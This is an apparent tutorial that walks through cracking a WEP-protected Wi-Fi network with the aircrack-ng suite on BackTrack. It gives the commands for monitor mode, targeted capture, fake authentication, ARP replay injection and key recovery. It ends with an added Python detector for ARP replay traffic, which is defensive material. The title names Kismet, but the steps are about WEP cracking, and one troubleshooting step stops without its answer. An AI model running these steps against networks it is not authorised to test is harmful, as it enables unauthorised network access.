Monitoring Wireless Traffic With Kismet
STEP 1:-
Place the BackTrack CD into your CD-ROM drive and boot into BackTrack. You may need to change a setting in your BIOS to boot from CD-ROM; during boot-up you should see a message like "Hit ctrl+esc to change BIOS settings", and setting your first boot device to CD-ROM will do the trick. Once booted into Linux, log in as root with username: root, password: toor (the default credentials used by BackTrack). A command prompt will appear. List your wireless interfaces with:
root@bt:~# airmon-ng
Interface Chipset Driver
wlan0 Ralink 2573 USB rt73usb - [phy0]
STEP 2:-
root@bt:~# airmon-ng start wlan0
This puts the card into monitor mode and creates a monitor interface (mon0 on this driver), which is the interface the remaining steps use.
STEP 3:-
Finding a suitable Target
After putting your card into monitor mode, we need to find a network that is protected by WEP. You can discover the surrounding networks by entering the following command:
root@bt:~# airodump-ng mon0
STEP 4:-
Attacking The Target
Now, to crack the WEP key, you will have to capture the target's data into a file. To do this we use the airodump tool again, but with some additional switches to target a specific AP and channel. Most importantly, you should restrict monitoring to a single channel to speed up data collection; otherwise the wireless card has to hop between all channels. You can restrict the capture with the following command:
root@bt:~# airodump-ng --bssid 00:11:22:33:44:55 -c (channel no) -w (filename) mon0
- --bssid is the MAC address of the target AP
- -w tells airodump to write the capture to a file with the given prefix
- -c is the channel of my target AP
STEP 5:-
Using aireplay to speed up cracking:-
root@bt:~# aireplay-ng -1 3 -a 00:11:22:33:44:55 mon0
STEP 6:-
Associate your wireless card with the AP you are accessing.
root@bt:~# aireplay-ng -1 0 -e linksys -a 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 mon0
- -1 at the beginning specifies the type of attack. In this case we want fake authentication with the AP. You can view all options by typing
aireplay-ng -h
- 0 specifies the delay in seconds between attacks
- -e is the ESSID tag. linksys is the ESSID or broadcast name of my target AP; belkin or default are other common names
- -a is the BSSID tag (MAC address). 00:11:22:33:44:55 is the MAC address of the target AP
- -h is your wireless adapter's MAC address. You can use macchanger to view and change your MAC address:
macchanger -s mon0
STEP 7:-
Start packet injection with aireplay:-
root@bt:~# aireplay-ng -3 -b 00:11:22:33:44:55 -h 00:fe:22:33:f4:e5 mon0
- -3 selects the ARP request replay attack
- -b requires the MAC address of the AP we are accessing.
- -h is your wireless adapter's MAC address. You can use macchanger to view and change your MAC address:
macchanger -s mon0
- if packets are being collected at a slow pace you can type
iwconfig wlan0 rate auto
(substitute your own interface name, e.g. ath0 on Atheros/madwifi cards) to adjust your wireless adapter's transmission rate. You can find your AP's transmission rate in Kismet by using the up/down arrow keys to select the AP and hitting enter; a dialog box will pop up with additional information. Common rates are 11M or 54M.
As aireplay runs, the ARP packet count will slowly increase. This may take a while if there aren't many ARP requests from other computers on the network; as it runs, however, the ARP count should start to increase more quickly. If the ARP count stops increasing, just open up a new terminal and re-associate with the AP as in step 6. There is no need to close the open aireplay terminal window before doing this; just do it simultaneously. You will probably need somewhere between 200-500k IV data packets for aircrack to break the WEP key.
If you get a message like this:
Notice: got a deauth/disassoc packet. Is the source MAC associated ?
STEP 8:-
Cracking the WEP Key with Aircrack:-
root@bt:~# aircrack-ng filename-01.cap
(airodump-ng appends a sequence number to the prefix given with -w, so the first capture file is filename-01.cap.) Once you have enough captured data packets, recovering the key will only take a couple of seconds. For my AP it took 380k data packets. If aircrack doesn't find the key almost immediately, just sit back and wait for more data packets.
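From the defender's side, the ARP replay in step 7 is easy to spot: a real client encrypts every frame with a fresh IV, whereas aireplay-ng -3 retransmits one captured frame (same IV, same ciphertext) thousands of times. The following detector is an added example, not part of this tutorial or the aircrack-ng project; it parses constructed 802.11 data frames (ToDS=1 only), extracts the WEP IV and flags any station repeating an identical IV+ciphertext pair, using the tutorial's example MAC addresses as sample data.

```python
from collections import Counter

def build_frame(src: bytes, bssid: bytes, iv: bytes, body: bytes) -> bytes:
    """Constructed 802.11 data frame: 24-byte header (ToDS=1, Protected=1),
    3-byte IV, 1-byte key index, then ciphertext+ICV."""
    fc = b"\x08\x41"                 # type=data; ToDS and Protected Frame bits set
    hdr = fc + b"\x00\x00" + bssid + src + b"\xff" * 6 + b"\x00\x00"
    return hdr + iv + b"\x00" + body

def parse_wep(frame: bytes):
    """Return (src, iv, body) for a protected ToDS data frame, else None."""
    if len(frame) < 32:
        return None
    if (frame[0] & 0x0C) != 0x08 or not (frame[1] & 0x40):
        return None                  # not a data frame, or not WEP-protected
    if (frame[1] & 0x03) != 0x01:
        return None                  # only ToDS=1/FromDS=0 handled (Addr2 = SA)
    return frame[10:16], frame[24:27], frame[28:]

def mac(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def detect_replay(frames, threshold: int = 20) -> dict:
    """Map source MAC -> highest repeat count of one (IV, ciphertext) pair,
    for stations exceeding the threshold. Legitimate clients never repeat one."""
    seen = Counter()
    for f in frames:
        parsed = parse_wep(f)
        if parsed:
            seen[parsed] += 1
    flagged = {}
    for (src, _iv, _body), n in seen.items():
        if n > threshold:
            flagged[mac(src)] = max(flagged.get(mac(src), 0), n)
    return flagged

# Constructed sample traffic: 10 normal frames with fresh IVs from a client,
# then 200 replays of one ARP-sized frame from the injecting station.
BSSID = bytes.fromhex("001122334455")
CLIENT = bytes.fromhex("aabbccddeeff")
INJECTOR = bytes.fromhex("00fe2233f4e5")
SAMPLE = [build_frame(CLIENT, BSSID, i.to_bytes(3, "big"), b"\x10" * 36) for i in range(10)]
SAMPLE += [build_frame(INJECTOR, BSSID, b"\x01\x02\x03", b"\x42" * 36)] * 200

if __name__ == "__main__":
    print(detect_replay(SAMPLE))     # {'00:fe:22:33:f4:e5': 200}
```

On real captures, feed the raw frames from a monitor-mode pcap (802.11 link type, radiotap stripped) into detect_replay; the threshold should sit well above what a single client retransmits per second.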